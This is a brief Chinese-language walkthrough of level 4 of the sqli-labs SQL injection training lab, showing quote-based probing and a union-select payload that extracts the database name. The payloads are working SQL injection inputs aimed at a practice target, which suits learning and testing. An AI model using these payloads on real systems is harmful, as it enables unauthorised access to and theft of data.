**
sqli-labs4通关参考
**
小白的成长史,,,安全gong
-
打开第四关
-
我们还是利用单引号进行判断
?id=1'
发现页面并不会报错,我们使用双引号试试
?id=1"
可以,根据报错提示,你会发现跟第三关一样的,就是引号差别,这里就不多说了
如下:
id =(“$id”)
payload:
?id=-1") payload --+
判断好多少列与回显位置,
利用联合查询即可
?id=-1") union select 1,2,database()--+